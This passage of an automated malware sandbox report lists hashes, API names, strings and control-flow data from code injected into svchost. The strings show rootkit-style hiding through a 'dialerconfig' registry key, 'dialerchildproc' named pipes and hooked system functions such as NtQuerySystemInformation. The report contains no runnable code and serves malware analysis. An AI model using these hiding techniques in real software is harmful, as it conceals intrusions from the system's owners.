                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                • String ID: ec
                                                                                • API String ID: 1443284424-2323562846
                                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction ID: 06e5a99c6ace4c596e7c110397052abb570d91e0ad481811551b3bfe074bb471
                                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction Fuzzy Hash: C1E1DEB2A04AC4AAF704CF64E48CADD7BB1F34578CF145116EE4A57B99DE34C89AC780
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction ID: a8961a7ee651d4004dd02de9a6ecf2c2672b3a30a7564fe475d554afff6cfbc0
                                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction Fuzzy Hash: C73139B2204EC4A6FB60CF60F848BED6360F784748F44542ADA4D47A98EF38C98CC750
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction ID: b2887cc395a5faa7b00bf96b452436ab8b07bf9528739ccab47d8010a9f63bfb
                                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction Fuzzy Hash: EE314F73205B8096FB609F60E888BEE7374F788744F84442ADA4D47B99EF39C589C714
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction ID: 8948c651d6124e182609c94cf1c10d7ef4f3a22f669835d067139a4db5baae0e
                                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction Fuzzy Hash: 74314B37214B8086EB60CF25E84CB9E73B4F788794F544126EA9D47BA9DF39C596CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                • String ID:
                                                                                • API String ID: 1443284424-0
                                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction ID: 1b87bc8c874e56d3d3c169fb44636a723f73c57bea5eb21ac934129e4f4b3f21
                                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction Fuzzy Hash: 12E1CC23B14A809AF700CB64D48CBDE7BB1F3497C8F548116EE5E97B99DA39C596C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: *?$ec
                                                                                • API String ID: 3215553584-4092517795
                                                                                • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                • Instruction ID: 4f290b775e720b47b549e23564b5709454933e10cc69a551538e7e74c1750620
                                                                                • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                • Instruction Fuzzy Hash: 545107A6710FD4A5FF15CFA1A90CA9D27A5FB48BDCF445532DE0907B45DA38C885C350

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 210 2c9b0291650-2c9b02916e2 GetProcessHeap call 2c9b02a3170 call 2c9b0291274 call 2c9b0291000 call 2c9b0291274 * 3 call 2c9b0291000 * 3 RegOpenKeyExW 229 2c9b02916e8-2c9b029170f RegOpenKeyExW 210->229 230 2c9b02918ce-2c9b02918d8 210->230 231 2c9b0291711-2c9b0291715 229->231 232 2c9b0291727-2c9b0291749 RegOpenKeyExW 229->232 233 2c9b0291718 call 2c9b02912c8 231->233 234 2c9b0291762-2c9b0291784 RegOpenKeyExW 232->234 235 2c9b029174b-2c9b029174f 232->235 238 2c9b029171d-2c9b0291721 RegCloseKey 233->238 236 2c9b0291786-2c9b029178a 234->236 237 2c9b029179d-2c9b02917bf RegOpenKeyExW 234->237 239 2c9b0291753 call 2c9b029104c 235->239 241 2c9b029178e call 2c9b02912c8 236->241 242 2c9b02917c1-2c9b02917c5 237->242 243 2c9b02917d8-2c9b02917fa RegOpenKeyExW 237->243 238->232 240 2c9b0291758-2c9b029175c RegCloseKey 239->240 240->234 244 2c9b0291793-2c9b0291797 RegCloseKey 241->244 245 2c9b02917c9 call 2c9b02912c8 242->245 246 2c9b0291813-2c9b0291835 RegOpenKeyExW 243->246 247 2c9b02917fc-2c9b0291800 243->247 244->237 248 2c9b02917ce-2c9b02917d2 RegCloseKey 245->248 250 2c9b0291837-2c9b029183b 246->250 251 2c9b029184e-2c9b0291870 RegOpenKeyExW 246->251 249 2c9b0291804 call 2c9b02912c8 247->249 248->243 254 2c9b0291809-2c9b029180d RegCloseKey 249->254 255 2c9b029183f call 2c9b029104c 250->255 252 2c9b0291872-2c9b0291876 251->252 253 2c9b0291889-2c9b02918ab RegOpenKeyExW 251->253 257 2c9b029187a call 2c9b029104c 252->257 258 2c9b02918c4-2c9b02918c8 RegCloseKey 253->258 259 2c9b02918ad-2c9b02918b1 253->259 254->246 256 2c9b0291844-2c9b0291848 RegCloseKey 255->256 256->251 260 2c9b029187f-2c9b0291883 RegCloseKey 257->260 258->230 261 2c9b02918b5 call 2c9b029104c 259->261 260->253 262 2c9b02918ba-2c9b02918be RegCloseKey 261->262 262->258
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction ID: edf67af7bff66bc60ca8b53d111852400304fc793cd55a6ddbb0235c759f6c2a
                                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction Fuzzy Hash: B6710EA6710E95A5FB10DF66F85CA9D67A4FB45B8CF006121EE4D47B68DF38C888C780

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction ID: 75be89b8b9e40e83f0c6c096a9e2c60e59ff02eda41980db4d81739b12b8f543
                                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction Fuzzy Hash: C5711927310A5086FB10AF66E8ACB9E27B4FB88B88F451121DE4D57B69DF3AC485C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction ID: 020e772d576f00d99347add5f2292ba766c675e3c542068a2e6c9be56f318122
                                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction Fuzzy Hash: 71513EB2614F84A6FB14CB62F54C75EB3A1F788B88F445124DA4947B24DF38C999C780

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction ID: 6637026aa8957acafcd2e0a44d11b25380a02c6a99089ab3ce8c4a7b387b649c
                                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction Fuzzy Hash: F1512773214B449AFB14CB62E54CB9EB3B1F789B84F488124DA8D07B64DF39C596CB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction ID: 7dff1f3bc662c7669749572a2cc9e8c08b78135b5d06f3b9d26c9fc167e4586a
                                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction Fuzzy Hash: 0D314DE4211ECAB0FA44EB65F85DEDC3365BB4434CF807563951A121669E388EDEC3D0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction ID: 20536cb3a11550025286f0da5bf58dd43d423097a010da5b39a9b468df922410
                                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction Fuzzy Hash: 6631A3A760094AA0FB0AEF65E86EFDE2335B748344FC05523E61D535759E7A86CBC380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction ID: 3828eef182e77682c835e905423648d12de48cf2ebd051e7c49122040d7d8954
                                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction Fuzzy Hash: 54213075614B84A2F710CB25F44C75E73A0F789BA8F505215EA5902BA8CF3CC98DCB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction ID: fc180ee831c8506696d5602361e060754a6b7b84c742be8878aad9c971ab8d70
                                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction Fuzzy Hash: 06210727614A4083FB108B25E55CB5F77B0F789BA4F944215EA9D02EA8DF3EC18ACB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID: ec
                                                                                • API String ID: 1666949209-2323562846
                                                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction ID: 0dace8d6bd9a90777621c15dd57f70dce61ecbc90fb16601d243c842cd82dca6
                                                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction Fuzzy Hash: B2D1AB76208F9891EA60DB09F49C75E77A0F388B88F505126EECD47B65DF39C985CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction ID: a49da4dc936d3b5161c2ce1e4e3776f2a0795eb5f0739f6b27e4dba07b8df9f3
                                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction Fuzzy Hash: 74414F73614BC4A7E764CF52E44C79EB7A1F389788F009125EB8907A58DF38D599CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction ID: e3b39bb0cc04648ab08d9c0db164dc9f172ca58bdf6f5f6947843ab4e850fb7d
                                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction Fuzzy Hash: CF416D33614B809BE7648F62E44CB9EB7B1F389B84F448129DB8907B58DF39D5A5CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 5697655953b5fdc9ab5e89f22f375a724f6cbdf3e79a1d6f51b2bee4457faf14
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 9B81136370064586FB60AB25D88DFAD63F2EBC5784F544025AE0D93B96DB3BCCC68780
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 85c7b66bcbfa76116f5cc34cf627d76ee3902447a3934a3e80eccfbb6efe619a
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 0881C0A1F04EC5A6FA50DB65B84DB9D6290BB8578CF84E035A90947796DE38CCCDC7C0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 971c2107e8b6edebaf37c1eaa0564c1e06a1e169659424f0b29349256a7c112b
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 1581B32371464186FB54AB2A984DF5E66B0AB897C0F784435EE0D877D6DB3BC8C2C710
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: ec$ec$ec$ec$ec
                                                                                • API String ID: 3215553584-2881439041
                                                                                • Opcode ID: 9ad20b57a19a6b594771c44f072b1513dbdea8ee4f74186793df5eca0a1bc1ed
                                                                                • Instruction ID: 74c303d65e877a87d64baef5fd484997c0eb7464c34f2c0442b193098c879c07
                                                                                • Opcode Fuzzy Hash: 9ad20b57a19a6b594771c44f072b1513dbdea8ee4f74186793df5eca0a1bc1ed
                                                                                • Instruction Fuzzy Hash: 92618FF2600EC4A2FA69DB14B54CB7E6690F79474CF14243ADE4A077A4DA74CCC9E2D0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction ID: 2ebc27563cb53dd51223e854b260d898d07826d60ce14d9c6c54c6a7dc828de6
                                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction Fuzzy Hash: 8B3170B1212ED4B5FE15DB06B80DB9D6394B749BB8F192529AD2D4B380DF38C889C380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction ID: c632506692dd73e368bd11d2d6ca1c93ee2176b7a5e6cc9f9f37c8a1d9e6abb1
                                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction Fuzzy Hash: 6C318033312B51A9FE529B12E81CB9E63B4BB48BA0F5A4535ED6D4B394EF39C4C58310
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction ID: 06a2e8dcdfaae49e8ef5d82a3c73ed4a5dc01ea41394421245c8ca2745061a2e
                                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction Fuzzy Hash: 6F115E61214F8896F750CB56F84CB1DA2A0F788BE8F045215EA5E877A4DF78C9888784
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction ID: 74c3eb22530787e170928ce6710496dfdb0b4d89fe4c21fcde6fb8d64f3e3c95
                                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction Fuzzy Hash: D3119D23314B408AF7508B42E84CB1F62B0F38CFE4F444224EA6D877A4CF7AC9968740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction ID: d6614abadd9f1dfbbd60444b095d62cb3f6108a6bb0f72da71a7f747c700d271
                                                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction Fuzzy Hash: 0FD17C77208B8885EA70DB1AE49C75E77B0F78CB84F500126EA8D47BA9DF39C591CB01
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction ID: 8be79d8b1ff3e7c74e386a710397fe5aed910680bc7ea69f879d0a06d9c72fb4
                                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction Fuzzy Hash: B0317F61701F95A2FA55DF56B84CA6DA3A0FB84B88F0460349E4D07B64EF38CCE9C780
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
